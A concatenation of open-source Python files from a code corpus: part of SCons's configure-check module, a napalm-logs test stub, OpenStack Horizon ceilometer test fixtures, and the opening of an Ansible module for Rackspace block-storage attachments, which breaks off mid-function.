raise SCons.Errors.BuildError # will be 'caught' in self.failed
elif is_up_to_date:
self.display("\"%s\" is up to date." % str(self.targets[0]))
binfo = self.targets[0].get_stored_info().binfo
self.display_cached_string(binfo)
elif dryrun:
raise ConfigureDryRunError(self.targets[0])
else:
# note stdout and stderr are the same here
s = sys.stdout = sys.stderr = Streamer(sys.stdout)
try:
env = self.targets[0].get_build_env()
if cache_mode == FORCE:
# Set up the Decider() to force rebuilds by saying
# that every source has changed. Note that we still
# call the environment's underlying source decider so
# that the correct .sconsign info will get calculated
# and keep the build state consistent.
def force_build(dependency, target, prev_ni,
env_decider=env.decide_source):
env_decider(dependency, target, prev_ni)
return True
if env.decide_source.func_code is not force_build.func_code:
env.Decider(force_build)
env['PSTDOUT'] = env['PSTDERR'] = s
try:
sconf.cached = 0
self.targets[0].build()
finally:
sys.stdout = sys.stderr = env['PSTDOUT'] = \
env['PSTDERR'] = sconf.logstream
except KeyboardInterrupt:
raise
except SystemExit:
exc_value = sys.exc_info()[1]
raise SCons.Errors.ExplicitExit(self.targets[0],exc_value.code)
except Exception, e:
for t in self.targets:
binfo = t.get_binfo()
binfo.__class__ = SConfBuildInfo
binfo.set_build_result(1, s.getvalue())
sconsign_entry = SCons.SConsign.SConsignEntry()
sconsign_entry.binfo = binfo
#sconsign_entry.ninfo = self.get_ninfo()
# We'd like to do this as follows:
# t.store_info(binfo)
# However, we need to store it as an SConfBuildInfo
# object, and store_info() will turn it into a
# regular FileNodeInfo if the target is itself a
# regular File.
sconsign = t.dir.sconsign()
sconsign.set_entry(t.name, sconsign_entry)
sconsign.merge()
raise e
else:
for t in self.targets:
binfo = t.get_binfo()
binfo.__class__ = SConfBuildInfo
binfo.set_build_result(0, s.getvalue())
sconsign_entry = SCons.SConsign.SConsignEntry()
sconsign_entry.binfo = binfo
#sconsign_entry.ninfo = self.get_ninfo()
# We'd like to do this as follows:
# t.store_info(binfo)
# However, we need to store it as an SConfBuildInfo
# object, and store_info() will turn it into a
# regular FileNodeInfo if the target is itself a
# regular File.
sconsign = t.dir.sconsign()
sconsign.set_entry(t.name, sconsign_entry)
sconsign.merge()
class SConfBase(object):
"""This is simply a class to represent a configure context. After
creating a SConf object, you can call any tests. After you have finished with
your tests, be sure to call the Finish() method, which returns the modified
environment.
Some words about caching: In most cases, it is not necessary to cache
test results explicitly. Instead, we use the scons dependency checking
mechanism. For example, if one wants to compile a test program
(SConf.TryLink), the compiler is only called if the program dependencies
have changed. However, if the program could not be compiled in a former
SConf run, we need to cache this error explicitly.
"""
def __init__(self, env, custom_tests = {}, conf_dir='$CONFIGUREDIR',
log_file='$CONFIGURELOG', config_h = None, _depth = 0):
"""Constructor. Pass additional tests in the custom_tests-dictinary,
e.g. custom_tests={'CheckPrivate':MyPrivateTest}, where MyPrivateTest
defines a custom test.
Note also the conf_dir and log_file arguments (you may want to
build tests in the VariantDir, not in the SourceDir)
"""
global SConfFS
if not SConfFS:
SConfFS = SCons.Node.FS.default_fs or \
SCons.Node.FS.FS(env.fs.pathTop)
if sconf_global is not None:
raise SCons.Errors.UserError
self.env = env
if log_file is not None:
log_file = SConfFS.File(env.subst(log_file))
self.logfile = log_file
self.logstream = None
self.lastTarget = None
self.depth = _depth
self.cached = 0 # will be set, if all test results are cached
# add default tests
default_tests = {
'CheckCC' : CheckCC,
'CheckCXX' : CheckCXX,
'CheckSHCC' : CheckSHCC,
'CheckSHCXX' : CheckSHCXX,
'CheckFunc' : CheckFunc,
'CheckType' : CheckType,
'CheckTypeSize' : CheckTypeSize,
'CheckDeclaration' : CheckDeclaration,
'CheckHeader' : CheckHeader,
'CheckCHeader' : CheckCHeader,
'CheckCXXHeader' : CheckCXXHeader,
'CheckLib' : CheckLib,
'CheckLibWithHeader' : CheckLibWithHeader,
}
self.AddTests(default_tests)
self.AddTests(custom_tests)
self.confdir = SConfFS.Dir(env.subst(conf_dir))
if config_h is not None:
config_h = SConfFS.File(config_h)
self.config_h = config_h
self._startup()
def Finish(self):
"""Call this method after finished with your tests:
env = sconf.Finish()
"""
self._shutdown()
return self.env
def Define(self, name, value = None, comment = None):
"""
Define a preprocessor symbol name, with the optional given value, in the
current config header.
If value is None (default), then #define name is written. If value is not
None, then #define name value is written.
comment is a string which will be put as a C comment in the
header, to explain the meaning of the value (appropriate C comment markers
/* and */ will be added automatically)."""
lines = []
if comment:
comment_str = "/* %s */" % comment
lines.append(comment_str)
if value is not None:
define_str = "#define %s %s" % (name, value)
else:
define_str = "#define %s" % name
lines.append(define_str)
lines.append('')
self.config_h_text = self.config_h_text + '\n'.join(lines)
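# Illustrative (hypothetical symbol): after
#     conf.Define('HAVE_ZLIB', 1, 'zlib was found')
# the accumulated config header text will contain:
#     /* zlib was found */
#     #define HAVE_ZLIB 1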
def BuildNodes(self, nodes):
"""
Tries to build the given nodes immediately. Returns 1 on success,
0 on error.
"""
if self.logstream is not None:
# override stdout / stderr to write in log file
oldStdout = sys.stdout
sys.stdout = self.logstream
oldStderr = sys.stderr
sys.stderr = self.logstream
# the engine assumes the current path is the SConstruct directory ...
old_fs_dir = SConfFS.getcwd()
old_os_dir = os.getcwd()
SConfFS.chdir(SConfFS.Top, change_os_dir=1)
# Because we take responsibility here for writing out our
# own .sconsign info (see SConfBuildTask.execute(), above),
# we override the store_info() method with a null place-holder
# so we really control how it gets written.
for n in nodes:
n.store_info = n.do_not_store_info
ret = 1
try:
# ToDo: use user options for calc
save_max_drift = SConfFS.get_max_drift()
SConfFS.set_max_drift(0)
tm = SCons.Taskmaster.Taskmaster(nodes, SConfBuildTask)
# we don't want to build tests in parallel
jobs = SCons.Job.Jobs(1, tm )
jobs.run()
for n in nodes:
state = n.get_state()
if (state != SCons.Node.executed and
state != SCons.Node.up_to_date):
# the node could not be built. we return 0 in this case
ret = 0
finally:
SConfFS.set_max_drift(save_max_drift)
os.chdir(old_os_dir)
SConfFS.chdir(old_fs_dir, change_os_dir=0)
if self.logstream is not None:
# restore stdout / stderr
sys.stdout = oldStdout
sys.stderr = oldStderr
return ret
def pspawn_wrapper(self, sh, escape, cmd, args, env):
"""Wrapper function for handling piped spawns.
This looks to the calling interface (in Action.py) like a "normal"
spawn, but associates the call with the PSPAWN variable from
the construction environment and with the streams to which we
want the output logged. This gets slid into the construction
environment as the SPAWN variable so Action.py doesn't have to
know or care whether it's spawning a piped command or not.
"""
return self.pspawn(sh, escape, cmd, args, env, self.logstream, self.logstream)
def TryBuild(self, builder, text = None, extension = ""):
"""Low level TryBuild implementation. Normally you don't need to
call that - you can use TryCompile / TryLink / TryRun instead
"""
global _ac_build_counter
# Make sure we have a PSPAWN value, and save the current
# SPAWN value.
try:
self.pspawn = self.env['PSPAWN']
except KeyError:
raise SCons.Errors.UserError('Missing PSPAWN construction variable.')
try:
save_spawn = self.env['SPAWN']
except KeyError:
raise SCons.Errors.UserError('Missing SPAWN construction variable.')
nodesToBeBuilt = []
f = "conftest_" + str(_ac_build_counter)
pref = self.env.subst( builder.builder.prefix )
suff = self.env.subst( builder.builder.suffix )
target = self.confdir.File(pref + f + suff)
try:
# Slide our wrapper into the construction environment as
# the SPAWN function.
self.env['SPAWN'] = self.pspawn_wrapper
sourcetext = self.env.Value(text)
if text is not None:
textFile = self.confdir.File(f + extension)
textFileNode = self.env.SConfSourceBuilder(target=textFile,
source=sourcetext)
nodesToBeBuilt.extend(textFileNode)
source = textFileNode
else:
source = None
nodes = builder(target = target, source = source)
if not SCons.Util.is_List(nodes):
nodes = [nodes]
nodesToBeBuilt.extend(nodes)
result = self.BuildNodes(nodesToBeBuilt)
finally:
self.env['SPAWN'] = save_spawn
_ac_build_counter = _ac_build_counter + 1
if result:
self.lastTarget = nodes[0]
else:
self.lastTarget = None
return result
def TryAction(self, action, text = None, extension = ""):
"""Tries to execute the given action with optional source file
contents <text> and optional source file extension <extension>.
Returns the status (0 : failed, 1 : ok) and the contents of the
output file.
"""
builder = SCons.Builder.Builder(action=action)
self.env.Append( BUILDERS = {'SConfActionBuilder' : builder} )
ok = self.TryBuild(self.env.SConfActionBuilder, text, extension)
del self.env['BUILDERS']['SConfActionBuilder']
if ok:
outputStr = self.lastTarget.get_contents()
return (1, outputStr)
return (0, "")
def TryCompile( self, text, extension):
"""Compiles the program given in text to an env.Object, using extension
as file extension (e.g. '.c'). Returns 1 if compilation was
successful, 0 otherwise. The target is saved in self.lastTarget (for
further processing).
"""
return self.TryBuild(self.env.Object, text, extension)
def TryLink( self, text, extension ):
"""Compiles the program given in text to an executable env.Program,
using extension as file extension (e.g. '.c'). Returns 1 if
compilation was successful, 0 otherwise. The target is saved in
self.lastTarget (for further processing).
"""
return self.TryBuild(self.env.Program, text, extension )
def TryRun(self, text, extension ):
"""Compiles and runs the program given in text, using extension
as file extension (e.g. '.c'). Returns (1, outputStr) on success,
(0, '') otherwise. The target (a file containing the program's stdout)
is saved in self.lastTarget (for further processing).
"""
ok = self.TryLink(text, extension)
if( ok ):
prog = self.lastTarget
pname = prog.path
output = self.confdir.File(os.path.basename(pname)+'.out')
node = self.env.Command(output, prog, [ [ pname, ">", "${TARGET}"] ])
ok = self.BuildNodes(node)
if ok:
outputStr = output.get_contents()
return( 1, outputStr)
return (0, "")
class TestWrapper(object):
"""A wrapper around Tests (to ensure sanity)"""
def __init__(self, test, sconf):
self.test = test
self.sconf = sconf
def __call__(self, *args, **kw):
if not self.sconf.active:
raise SCons.Errors.UserError
context = CheckContext(self.sconf)
ret = self.test(context, *args, **kw)
if self.sconf.config_h is not None:
self.sconf.config_h_text = self.sconf.config_h_text + context.config_h
context.Result("error: no result")
return ret
def AddTest(self, test_name, test_instance):
"""Adds test_class to this SConf instance. It can be called with
self.test_name(...)"""
setattr(self, test_name, SConfBase.TestWrapper(test_instance, self))
def AddTests(self, tests):
"""Adds all the tests given in the tests dictionary to this SConf
instance
"""
for name in tests.keys():
self.AddTest(name, tests[name])
def _createDir( self, node ):
dirName = str(node)
if dryrun:
if not os.path.isdir( dirName ):
raise ConfigureDryRunError(dirName)
else:
if not os.path.isdir( dirName ):
os.makedirs( dirName )
node._exists = 1
def _startup(self):
"""Private method. Set up logstream, and set the environment
variables necessary for a piped build
"""
global _ac_config_logs
global sconf_global
global SConfFS
self.lastEnvFs = self.env.fs
self.env.fs = SConfFS
self._createDir(self.confdir)
self.confdir.up().add_ignore( [self.confdir] )
if self.logfile is not None and not dryrun:
# truncate logfile, if SConf.Configure is called for the first time
# in a build
if self.logfile in _ac_config_logs:
log_mode = "a"
else:
_ac_config_logs[self.logfile] = None
log_mode = "w"
fp = open(str(self.logfile), log_mode)
self.logstream = SCons.Util.Unbuffered(fp)
# logfile may stay in a build directory, so we tell
# the build system not to override it with a possibly
# existing file with the same name in the source directory
self.logfile.dir.add_ignore( [self.logfile] )
tb = traceback.extract_stack()[-3-self.depth]
old_fs_dir = SConfFS.getcwd()
SConfFS.chdir(SConfFS.Top, change_os_dir=0)
self.logstream.write('file %s,line %d:\n\tConfigure(confdir = %s)\n' %
(tb[0], tb[1], str(self.confdir)) )
SConfFS.chdir(old_fs_dir)
else:
self.logstream = None
# we use a special builder to create source files from TEXT
action = SCons.Action.Action(_createSource,
_stringSource)
sconfSrcBld = SCons.Builder.Builder(action=action)
self.env.Append( BUILDERS={'SConfSourceBuilder':sconfSrcBld} )
self.config_h_text = _ac_config_hs.get(self.config_h, "")
self.active = 1
# only one SConf instance should be active at a time ...
sconf_global = self
def _shutdown(self):
"""Private method. Reset to non-piped spawn"""
global sconf_global, _ac_config_hs
if not self.active:
raise SCons.Errors.UserError("Finish may be called only once!")
if self.logstream is not None and not dryrun:
self.logstream.write("\n")
self.logstream.close()
self.logstream = None
# remove the SConfSourceBuilder from the environment
blds = self.env['BUILDERS']
del blds['SConfSourceBuilder']
self.env.Replace( BUILDERS=blds )
self.active = 0
sconf_global = None
if not self.config_h is None:
_ac_config_hs[self.config_h] = self.config_h_text
self.env.fs = self.lastEnvFs
class CheckContext(object):
"""Provides a context for configure tests. Defines how a test writes to the
screen and log file.
A typical test is just a callable with an instance of CheckContext as
first argument:
def CheckCustom(context, ...)
context.Message('Checking my weird test ... ')
ret = myWeirdTestFunction(...)
context.Result(ret)
Often, myWeirdTestFunction will be one of
context.TryCompile/context.TryLink/context.TryRun. The results of
those are cached, for they are only rebuilt if the dependencies have
changed.
"""
def __init__(self, sconf):
"""Constructor. Pass the corresponding SConf instance."""
self.sconf = sconf
self.did_show_result = 0
# for Conftest.py:
self.vardict = {}
self.havedict = {}
self.headerfilename = None
self.config_h = "" # config_h text will be stored here
# We don't regenerate the config.h file after each test. That means
# that tests won't be able to include the config.h file, and so
# they can't do an #ifdef HAVE_XXX_H. This shouldn't be a major
# issue, though. If it turns out that we need to include config.h
# in tests, we must ensure that the dependencies are worked out
# correctly. Note that we can't use Conftest.py's support for config.h,
# because we would need to specify a builder for the config.h file ...
def Message(self, text):
"""Inform about what we are doing right now, e.g.
'Checking for SOMETHING ... '
"""
self.Display(text)
self.sconf.cached = 1
self.did_show_result = 0
def Result(self, res):
"""Inform about the result of the test. res may be an integer or a
string. In case of an integer, the written text will be 'yes' or 'no'.
The result is only displayed when self.did_show_result is not set.
"""
if isinstance(res, (int, bool)):
if res:
text = "yes"
else:
text = "no"
elif isinstance(res, str):
text = res
else:
raise TypeError("Expected string, int or bool, got " + str(type(res)))
if self.did_show_result == 0:
# Didn't show result yet, do it now.
self.Display(text + "\n")
self.did_show_result = 1
def TryBuild(self, *args, **kw):
return self.sconf.TryBuild(*args, **kw)
def TryAction(self, *args, **kw):
return self.sconf.TryAction(*args, **kw)
def TryCompile(self, *args, **kw):
return self.sconf.TryCompile(*args, **kw)
def TryLink(self, *args, **kw):
return self.sconf.TryLink(*args, **kw)
def TryRun(self, *args, **kw):
return self.sconf.TryRun(*args, **kw)
def __getattr__( self, attr ):
if( attr == 'env' ):
return self.sconf.env
elif( attr == 'lastTarget' ):
return self.sconf.lastTarget
else:
raise AttributeError("CheckContext instance has no attribute '%s'" % attr)
#### Stuff used by Conftest.py (look there for explanations).
def BuildProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.Program, text, ext)
def CompileProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.Object, text, ext)
def CompileSharedObject(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $SHCC, $CPPFLAGS, etc.
return not self.TryBuild(self.env.SharedObject, text, ext)
def RunProg(self, text, ext):
self.sconf.cached = 1
# TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
st, out = self.TryRun(text, ext)
return not st, out
def AppendLIBS(self, lib_name_list):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Append(LIBS = lib_name_list)
return oldLIBS
def PrependLIBS(self, lib_name_list):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Prepend(LIBS = lib_name_list)
return oldLIBS
def SetLIBS(self, val):
oldLIBS = self.env.get( 'LIBS', [] )
self.env.Replace(LIBS = val)
return oldLIBS
def Display(self, msg):
if self.sconf.cached:
# We assume that Display is called twice for each test here:
# once for the "Checking for ..." message and once for the result.
# The self.sconf.cached flag can only be set between those calls.
msg = "(cached) " + msg
self.sconf.cached = 0
progress_display(msg, append_newline=0)
self.Log("scons: Configure: " + msg + "\n")
def Log(self, msg):
if self.sconf.logstream is not None:
self.sconf.logstream.write(msg)
#### End of stuff used by Conftest.py.
def SConf(*args, **kw):
if kw.get(build_type, True):
kw['_depth'] = kw.get('_depth', 0) + 1
for bt in build_types:
try:
del kw[bt]
except KeyError:
pass
return SConfBase(*args, **kw)
else:
return SCons.Util.Null()
def CheckFunc(context, function_name, header = None, language = None):
res = SCons.Conftest.CheckFunc(context, function_name, header = header, language = language)
context.did_show_result = 1
return not res
def CheckType(context, type_name, includes = "", language = None):
res = SCons.Conftest.CheckType(context, type_name,
header = includes, language = language)
context.did_show_result = 1
return not res
def CheckTypeSize(context, type_name, includes = "", language = None, expect = None):
res = SCons.Conftest.CheckTypeSize(context, type_name,
header = includes, language = language,
expect = expect)
context.did_show_result = 1
return res
def CheckDeclaration(context, declaration, includes = "", language = None):
res = SCons.Conftest.CheckDeclaration(context, declaration,
includes = includes,
language = language)
context.did_show_result = 1
return not res
def createIncludesFromHeaders(headers, leaveLast, include_quotes = '""'):
# used by CheckHeader and CheckLibWithHeader to produce C - #include
# statements from the specified header (list)
if not SCons.Util.is_List(headers):
headers = [headers]
l = []
if leaveLast:
lastHeader = headers[-1]
headers = headers[:-1]
else:
lastHeader = None
for s in headers:
l.append("#include %s%s%s\n"
% (include_quotes[0], s, include_quotes[1]))
return ''.join(l), lastHeader
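# Illustrative call (hypothetical headers): with the default '""' quotes,
#
#   createIncludesFromHeaders(['stdio.h', 'stdlib.h'], leaveLast=1)
#
# returns ('#include "stdio.h"\n', 'stdlib.h') -- the last header is handed
# back separately so CheckHeader below can test it on top of the prerequisite
# includes.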
def CheckHeader(context, header, include_quotes = '<>', language = None):
"""
A test for a C or C++ header file.
"""
prog_prefix, hdr_to_check = \
createIncludesFromHeaders(header, 1, include_quotes)
res = SCons.Conftest.CheckHeader(context, hdr_to_check, prog_prefix,
language = language,
include_quotes = include_quotes)
context.did_show_result = 1
return not res
def CheckCC(context):
res = SCons.Conftest.CheckCC(context)
context.did_show_result = 1
return not res
def CheckCXX(context):
res = SCons.Conftest.CheckCXX(context)
context.did_show_result = 1
return not res
def CheckSHCC(context):
res = SCons.Conftest.CheckSHCC(context)
context.did_show_result = 1
return not res
def CheckSHCXX(context):
res = SCons.Conftest.CheckSHCXX(context)
context.did_show_result = 1
return not res
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCHeader(context, header, include_quotes = '""'):
"""
A test for a C header file.
"""
return CheckHeader(context, header, include_quotes, language = "C")
# Bram: Make this function obsolete? CheckHeader() is more generic.
def CheckCXXHeader(context, header, include_quotes = '""'):
"""
A test for a C++ header file.
"""
return CheckHeader(context, header, include_quotes, language = "C++")
def CheckLib(context, library = None, symbol = "main",
header = None, language = None, autoadd = 1):
"""
A test for a library. See also CheckLibWithHeader.
Note that library may also be None to test whether the given symbol
compiles without flags.
"""
if library == []:
library = [None]
if not SCons.Util.is_List(library):
library = [library]
# ToDo: accept path for the library
res = SCons.Conftest.CheckLib(context, library, symbol, header = header,
language = language, autoadd = autoadd)
context.did_show_result = 1
return not res
# XXX
# Bram: Can only include one header and can't use #ifdef HAVE_HEADER_H.
def CheckLibWithHeader(context, libs, header, language,
call = None, autoadd = 1):
# ToDo: accept path for library. Support system header files.
"""
Another (more sophisticated) test for a library.
Checks if library and header are available for language (may be 'C'
or 'CXX'). call may be a valid expression _with_ a trailing ';'.
As in CheckLib, we support library=None, to test if the call compiles
without extra link flags.
"""
prog_prefix, dummy = \
createIncludesFromHeaders(header, 0)
if libs == []:
libs = [None]
if not SCons.Util.is_List(libs):
libs = [libs]
res = SCons.Conftest.CheckLib(context, libs, None, prog_prefix,
call = call, language = language, autoadd = autoadd)
context.did_show_result = 1
return not res
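# Typical use from an SConscript/SConstruct (illustrative sketch):
#
#   conf = Configure(env)
#   if not conf.CheckLibWithHeader('m', 'math.h', 'c'):
#       print 'Did not find libm, exiting!'
#       Exit(1)
#   env = conf.Finish()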
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
napalm-automation/napalm-logs
|
refs/heads/develop
|
tests/test_base.py
|
1
|
# -*- coding: utf-8 -*-
'''
Test the napalm-logs base class.
'''
from __future__ import absolute_import
from __future__ import unicode_literals
|
VaneCloud/horizon
|
refs/heads/stable/kilo
|
openstack_dashboard/test/test_data/ceilometer_data.py
|
56
|
# Copyright 2012 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ceilometerclient.v2 import meters
from ceilometerclient.v2 import resources
from ceilometerclient.v2 import samples
from ceilometerclient.v2 import statistics
from keystoneclient.v2_0 import tenants
from keystoneclient.v2_0 import users
from openstack_dashboard.api import ceilometer
from openstack_dashboard.test.test_data import utils
def data(TEST):
TEST.ceilometer_users = utils.TestDataContainer()
TEST.ceilometer_tenants = utils.TestDataContainer()
TEST.resources = utils.TestDataContainer()
TEST.api_resources = utils.TestDataContainer()
TEST.samples = utils.TestDataContainer()
TEST.meters = utils.TestDataContainer()
TEST.statistics = utils.TestDataContainer()
TEST.global_disk_usages = utils.TestDataContainer()
TEST.global_network_usages = utils.TestDataContainer()
TEST.global_network_traffic_usages = utils.TestDataContainer()
TEST.global_object_store_usages = utils.TestDataContainer()
TEST.statistics_array = utils.TestDataContainer()
# users
ceilometer_user_dict1 = {'id': "1",
'name': 'user',
'email': 'test@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '1',
'enabled': True,
'domain_id': "1"}
ceilometer_user_dict2 = {'id': "2",
'name': 'user2',
'email': 'test2@example.com',
'password': 'password',
'token': 'test_token',
'project_id': '2',
'enabled': True,
'domain_id': "2"}
TEST.ceilometer_users.add(users.User(None,
ceilometer_user_dict1))
TEST.ceilometer_users.add(users.User(None,
ceilometer_user_dict2))
# Tenants.
tenant_dict = {'id': "1",
'name': 'test_tenant',
'description': "a test tenant.",
'enabled': True,
'domain_id': '1'}
tenant_dict_2 = {'id': "2",
'name': 'disabled_tenant',
'description': "a disabled test tenant.",
'enabled': False,
'domain_id': '2'}
tenant_dict_3 = {'id': "3",
'name': u'\u4e91\u89c4\u5219',
'description': "an unicode-named tenant.",
'enabled': True,
'domain_id': '2'}
ceilometer_tenant = tenants.Tenant(tenants.TenantManager,
tenant_dict)
ceilometer_disabled_tenant = tenants.Tenant(tenants.TenantManager,
tenant_dict_2)
ceilometer_tenant_unicode = tenants.Tenant(tenants.TenantManager,
tenant_dict_3)
TEST.ceilometer_tenants.add(ceilometer_tenant,
ceilometer_disabled_tenant,
ceilometer_tenant_unicode)
# resources
resource_dict_1 = dict(
resource_id='fake_resource_id',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'storage.objects'}],
)
resource_dict_2 = dict(
resource_id='fake_resource_id2',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'storage.objects'}],
)
resource_dict_3 = dict(
resource_id='fake_resource_id3',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'instance'}],
)
resource_dict_4 = dict(
resource_id='fake_resource_id3',
project_id='fake_project_id',
user_id="fake_user_id",
timestamp='2012-07-02T10:42:00.000000',
metadata={'tag': 'self.counter3', 'display_name': 'test-server'},
links=[{'url': 'test_url', 'rel': 'memory'}],
)
resource_1 = resources.Resource(resources.ResourceManager(None),
resource_dict_1)
resource_2 = resources.Resource(resources.ResourceManager(None),
resource_dict_2)
resource_3 = resources.Resource(resources.ResourceManager(None),
resource_dict_3)
resource_4 = resources.Resource(resources.ResourceManager(None),
resource_dict_4)
TEST.resources.add(resource_1)
TEST.resources.add(resource_2)
TEST.resources.add(resource_3)
# Having a separate set of fake objects for openstack_dashboard
# api Resource class. This is required because of additional methods
# defined in openstack_dashboard.api.ceilometer.Resource
api_resource_1 = ceilometer.Resource(resource_1)
api_resource_2 = ceilometer.Resource(resource_2)
api_resource_3 = ceilometer.Resource(resource_3)
api_resource_4 = ceilometer.Resource(resource_4)
TEST.api_resources.add(api_resource_1)
TEST.api_resources.add(api_resource_2)
TEST.api_resources.add(api_resource_3)
TEST.api_resources.add(api_resource_4)
# samples
sample_dict_1 = {'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id',
'counter_name': 'image',
'counter_type': 'gauge',
'counter_unit': 'image',
'counter_volume': 1,
'timestamp': '2012-12-21T11:00:55.000000',
'metadata': {'name1': 'value1', 'name2': 'value2'},
'message_id': 'fake_message_id'}
sample_dict_2 = {'resource_id': 'fake_resource_id2',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id',
'counter_name': 'image',
'counter_type': 'gauge',
'counter_unit': 'image',
'counter_volume': 1,
'timestamp': '2012-12-21T11:00:55.000000',
'metadata': {'name1': 'value1', 'name2': 'value2'},
'message_id': 'fake_message_id'}
sample_1 = samples.Sample(samples.SampleManager(None), sample_dict_1)
sample_2 = samples.Sample(samples.SampleManager(None), sample_dict_2)
TEST.samples.add(sample_1)
TEST.samples.add(sample_2)
# meters
meter_dict_1 = {'name': 'instance',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_dict_2 = {'name': 'instance',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_dict_3 = {'name': 'disk.read.bytes',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_dict_4 = {'name': 'disk.write.bytes',
'type': 'gauge',
'unit': 'instance',
'resource_id': 'fake_resource_id',
'project_id': 'fake_project_id',
'user_id': 'fake_user_id'}
meter_1 = meters.Meter(meters.MeterManager(None), meter_dict_1)
meter_2 = meters.Meter(meters.MeterManager(None), meter_dict_2)
meter_3 = meters.Meter(meters.MeterManager(None), meter_dict_3)
meter_4 = meters.Meter(meters.MeterManager(None), meter_dict_4)
TEST.meters.add(meter_1)
TEST.meters.add(meter_2)
TEST.meters.add(meter_3)
TEST.meters.add(meter_4)
# statistic
statistic_dict_1 = {'min': 1,
'max': 9,
'avg': 4.55,
'sum': 45,
'count': 10,
'duration_start': '2012-12-21T11:00:55.000000',
'duration_end': '2012-12-21T11:00:55.000000',
'period': 7200,
'period_start': '2012-12-21T11:00:55.000000',
'period_end': '2012-12-21T11:00:55.000000'}
statistic_1 = statistics.Statistics(statistics.StatisticsManager(None),
statistic_dict_1)
TEST.statistics.add(statistic_1)
|
Trois-Six/ansible-modules-core
|
refs/heads/devel
|
cloud/rackspace/rax_cbs_attachments.py
|
157
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_cbs_attachments
short_description: Manipulate Rackspace Cloud Block Storage Volume Attachments
description:
- Manipulate Rackspace Cloud Block Storage Volume Attachments
version_added: 1.6
options:
device:
description:
- The device path to attach the volume to, e.g. /dev/xvde
default: null
required: true
volume:
description:
- Name or id of the volume to attach/detach
default: null
required: true
server:
description:
- Name or id of the server to attach/detach
default: null
required: true
state:
description:
- Indicate desired state of the resource
choices:
- present
- absent
default: present
required: true
wait:
description:
- wait for the volume to be in 'in-use'/'available' state before returning
default: "no"
choices:
- "yes"
- "no"
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
author:
- "Christopher H. Laco (@claco)"
- "Matt Martz (@sivel)"
extends_documentation_fragment: rackspace.openstack
'''
EXAMPLES = '''
- name: Attach a Block Storage Volume
gather_facts: False
hosts: local
connection: local
tasks:
- name: Storage volume attach request
local_action:
module: rax_cbs_attachments
credentials: ~/.raxpub
volume: my-volume
server: my-server
device: /dev/xvdd
region: DFW
wait: yes
state: present
register: my_volume
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def cloud_block_storage_attachments(module, state, volume, server, device,
wait, wait_timeout):
cbs = pyrax.cloud_blockstorage
cs = pyrax.cloudservers
if cbs is None or cs is None:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
changed = False
instance = {}
volume = rax_find_volume(module, pyrax, volume)
if not volume:
module.fail_json(msg='No matching storage volumes were found')
if state == 'present':
server = rax_find_server(module, pyrax, server)
if (volume.attachments and
volume.attachments[0]['server_id'] == server.id):
changed = False
elif volume.attachments:
module.fail_json(msg='Volume is attached to another server')
else:
try:
volume.attach_to_instance(server, mountpoint=device)
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
volume.get()
for key, value in vars(volume).iteritems():
if (isinstance(value, NON_CALLABLES) and
not key.startswith('_')):
instance[key] = value
result = dict(changed=changed)
if volume.status == 'error':
result['msg'] = '%s failed to build' % volume.id
elif wait:
attempts = wait_timeout / 5
pyrax.utils.wait_until(volume, 'status', 'in-use',
interval=5, attempts=attempts)
volume.get()
result['volume'] = rax_to_dict(volume)
if 'msg' in result:
module.fail_json(**result)
else:
module.exit_json(**result)
elif state == 'absent':
server = rax_find_server(module, pyrax, server)
if (volume.attachments and
volume.attachments[0]['server_id'] == server.id):
try:
volume.detach()
if wait:
